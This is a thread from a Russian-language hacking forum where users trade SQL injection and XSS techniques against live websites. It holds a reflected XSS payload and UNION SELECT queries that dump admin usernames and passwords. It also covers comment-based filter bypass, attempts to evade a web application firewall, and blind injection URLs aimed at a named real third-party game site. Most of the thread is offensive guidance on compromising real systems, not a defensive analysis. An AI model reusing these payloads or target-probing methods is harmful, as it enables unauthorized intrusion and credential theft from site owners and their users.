FlaktW зачем тебе именно через information_schema выводить?? information_schema и есть таблица.. и ничего от туда кроме имен не выведешь... Проше сделать прямой запрос, чем так извращатся!!
подскажите каким образом реализовать пассивную XSS usersearch.php?em="><script>alert(/XSS/)</script> в поле Email, я примерно знаю, но никак не получается реализовать, если можно, то попобробней!
несколько вопросов 1. section=113+union+select 1 from w на что получаю ответ. DB Error: Table 'xxx.w' doesn't exist.... Смысл ошибки понятен, но почему такое странное имя таблицы, если я выбирал из w? 2. .... INTO Outfile char(11,22) почему это ошибка, char вроде должен возвращать строку 3. server version for the right syntax to use near ''(две кавычки) at line 1 Ответ от БД, если вставляю кавычку в запрос. Почему такое происходит? Есть ли возможность это обойти?
1.xxx это имя текущей базы 2. в запросе into outfile char не катит 3.кавычки фильтруются,синтаксическая ошибка mysql
Konqi, а нажать кнопочку "Edit" религия не позволяет? PS: FlaktW, насколько я знаю, в MySQL регистр не важен.
\ Если быть точнее, то это БД => база данных Вот эта переписка, вообще как будто из фильма "Чужие 3". Самое главное пытаются использвать "умные" слова, но по смыслу такой чес получается. А самое печальное, что на глупый вопрос, другие вроде бы не глупые люди (хотя может я ошибаюсь), пытаются найти глупый ответ. На баш хочешь? зы. Как я понял, правильный запрос был такой. union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12+from+admin, т.е. в нижнем регистре. Но то как искали решение, меня просто убило
подскажите, пожалуйста. на сервере IIS, и, как я понял, ODBC (вообщем, там MySQL). myguild.asp?gid=2779-1 - не проходит myguild.asp?gid=2779' - ошибка: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1 /myguild/myguild_common.asp, line 7 myguild.asp?gid=2779+order+by+1/* - проходит myguild.asp?gid=2779+order+by+1-- - не проходит, т.е. -- фильтрует, а /* нет. Но когда я делаю такое: myguild.asp?gid=2779+union+select+1/* , сервер выдает алерт: Code: Alert Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site. что можно сделать?
хм, а почему тогда Code: [MySQL][ODBC 3.51 Driver][mysqld-5.0.24a]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1 ?
Значит так, дорогие друзья. Мы тут почитали посты за сегодняшний день, и я решил ужесточить на время летних каникул модерацию данного топика. В связи с этим знаменательным событием прошу постоянных читателей и писателей думать что вы пишите, а в часности: Задающим вопросы - воспользоваться поиском и что-то сначала почитать Отвечающим на вопросы - хорошенько подумать перед ответом. Не нужно показывать свою некомпетентность и писать ОХИНЕЮ отвечая на вопросы, я буду расценивать это как подрыв доверия к форуму в целом (вот такой я наркоман !) =============================================== Далее, хотелось-бы услышать пояснения к некоторым ответам. В часности: поясните пожалуйста, что это за конструкция вот структура INFORMATION_SCHEMA, где там прячутся те поля, которые он хочет вывести? http://www.rldp.ru/mysql/mysqlpro/schema.htm то-же самое, где там они, покажите пожалуйста Эээ? ЧТО ТУТ ПРОИСХОДИТ??777!!! =========================== Это подборка только за сегодняшний вечер! Вобщем если это будет продолжаться, не обижайтесь на меня =\
Если ты хочешь скрыть линк, то скрывай как полагается. Лугл палит Именно в этом запросе, что ты указал, крути как UPDATE; http://hero2.eamobile.co.kr/myguild/myguild.asp?gid=474-1&lid=867&page=1 Сайт ватовый, нашел по быстрому блинд (с выводом нету время искать). Там действительно mysql. Но в теории под игру стоит ещё и mssql. http://hero2.eamobile.co.kr/community.asp?cid=86488+and+substring(version(),1,1)=5&page=1 зы. Jokester, теперь я опередил твою мысль. Правда я решил не цитировать Bb0y, вроде как парень старается (в плане на форуме), но видимо не понял что от него хотел ТС, а ты я вижу никого не пожалел. Ну и ладно...
3. хм... я всегда думал, что кавычки фильтруются на уровне кода, который посылает запросы(а не на уровне БД). А как тогда они составляют запросы, если кавычки не допустимы (понятно что можно обойтись в больших кол-вах случаев и без них, но это же убого)?
